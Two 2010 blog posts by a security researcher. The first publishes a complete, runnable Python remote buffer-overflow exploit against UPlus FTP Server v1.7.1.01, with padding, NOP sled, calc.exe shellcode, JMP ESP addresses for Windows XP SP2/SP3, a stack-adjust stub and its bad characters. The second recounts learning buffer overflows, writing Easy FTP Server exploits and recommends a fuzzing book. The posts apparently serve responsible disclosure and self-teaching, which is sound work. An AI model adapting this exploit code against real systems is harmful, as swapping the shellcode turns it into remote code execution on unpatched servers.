Thursday, July 29, 2010

UPlus FTP Server v1.7.1.0.1 remote buffer overflow exploit published

Hi All,

Posted another remote code execution exploit on Exploit-db an hour back. It is published now :-)

###
#!/usr/bin/python
import socket,sys,base64
print """
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
    Discovered by : Karn Ganeshen                         
    Author : Karn Ganeshen / corelanc0d3r
                                                    
    KarnGaneshen [aT] gmail [d0t] com                         
    http://ipositivesecurity.blogspot.com
                                                
    Greetz out to:  corelanc0d3r
                    http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
"""
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
if len(sys.argv) != 5:
    print "Usage: ./poc.py <Target IP> <Port> <User> <Password>"
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
auth = base64.b64encode(user+":"+pwd)
buf="A"*1963
buf+="\x90"*179
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=("\xd9\xca\x29\xc9\xb1\x24\xbf\x3f\xc7\x66\x9f\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x17\x03\x7e\x17\x83\xf9\xc3\x84\x6a\xf9\x24\x0c\x95\x01"
"\xb5\x06\xd0\x3d\x3e\x64\xde\x45\x41\x7a\x6b\xfa\x59\x0f\x33\x24"
"\x5b\xe4\x85\xaf\x6f\x71\x14\x41\xbe\x45\x8e\x31\x45\x85\xc5\x4e"
"\x87\xcc\x2b\x51\xc5\x3a\xc7\x6a\x9d\x98\x2c\xf9\xf8\x6a\x73\x25"
"\x02\x86\xea\xae\x08\x13\x78\xef\x0c\xa2\x95\x84\x31\x2f\x68\x71"
"\xc0\x73\x4f\x81\x10\xba\x4f\xed\x1d\xfd\x7f\x68\xe1\x86\x73\xf9"
"\xa2\x7a\x07\x8d\x3e\x2e\x9c\x05\x37\xdb\xaa\x5e\xc7\xab\xad\x60"
"\xc8\x40\xc5\x5c\x97\x67\xe0\xfc\x71\x01\xf4\x7f\xbd\x6a\x55\x17"
"\xce\x07\x51\xb8\x46\x80\xa4\xcc\x99\xe7\xa7\x37\xc6\x66\x34\xd4"
"\x27\x0c\xbc\x7f\x38")
buf+="\x90"*15
#[ XP SP2 ] -> "\x78\x16\xF3\x77"    #0x77F31678  JMP ESP
buf+="\x78\x16\xF3\x77"
#[ XP SP3 ] -> "\x3F\x71\x49\x7E"   #0x7E49713F  JMP ESP
#buf+="\x3F\x71\x49\x7E"
buf+="\x90"*30
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x66\x05\x7A\x03"         #ADD AX,037A
buf+="\x50\xc3"                 #PUSH EAX + RET
print "[+] Launching exploit against " + target + "..."
head = "GET /list.html?path="+buf+" HTTP/1.1 \r\n"
head += "Host: \r\n"
head += "Authorization: Basic "+auth+"\r\n"
  
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + "\r\n")
    print "[!] Payload sent..."
    s.close()
except:
    print "[x] Error!"
I actually missed out specifying the bad chars which I excluded while generating the payload. So here they are:
\x0a \x20 \x25 \x26

I should be able to post a video showing how this exploit was prepared & tested. Watch out on this space!

Shoutz to corelanc0d3r! :)

You may also check it out here:

Update: Advisory published on Secunia -> http://secunia.com/advisories/40771

Best Regards.

Monday, July 19, 2010

2 Remote Buffer Overflow Code Execution Exploits Published

Hey folks,

As of late, I am reading up on buffer overflows. This is one topic I had been escaping for quite a time. All those hexes \x* , CPU Registers [ eip, esp, ecx, ebx eax ], exploit jargon like sled, nops, jmp et all just didn't made any sense. Until few weeks back when I decided to take it head on / [ me beats his chest and roars! ] :D

<-----Rewind----->Back a few weeks from now

I wanted to start up with something new. Had an idea and started researching on it. It is an interesting subject but there's not much of a 'fresh' learning. So, I put it on a pause for a while and decided to start with BoF. Nevertheless, it's going to be useful to many who are freshers or currently in the Information Security domain ofcourse when I complete it. ;)

After going over half-a-dozen quality articles, ability server & sl mail tutorial by guys over at offsec, I began testing on an open-source ftp server - Easy FTP server v1.7.0.11.

For a perfect noobie in BoF, easyftp server was no easy.. :)
Anyways, in around half a day, I could confirm 2 vuln commands in this application. Working on and off along with work at office, I wrote stable Remote Buffer Overflow command execution exploits for each of these. J

<-----quick snip----->
For those who are new at fuzzing and finding buffer overflows, and are looking for a formal book, here is one that I'd recommend ya:

This is a nice book that would take you through basics of fuzzing, gradually introducing you to several fuzzing frameworks available today.

A good read for anyone wanting to learn fuzzing.

Fuzzing... is the first and only book to cover fuzzing from start to finish, bringing disciplined best practices to a technique that has traditionally been implemented informally. The authors begin by reviewing how fuzzing works and outlining its crucial advantages over other security testing methods. Next, they introduce state-of-the-art fuzzing techniques for finding vulnerabilities in network protocols, file formats, and web applications; demonstrate the use of automated fuzzing tools; and present several insightful case histories showing fuzzing at work.

<-----recent----->
I submitted my exploits over to Exploit-db yesterday [ http://www.exploit-db.com/remote/ ] and later in the day, saw they were confirmed as well. :)

<-----today----->
I feel great at this. Though it's simple, now that I know it, the experience which came out of past few weeks is real learning and very interesting.

You may chose to read my exploits here:



Best Regards.

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.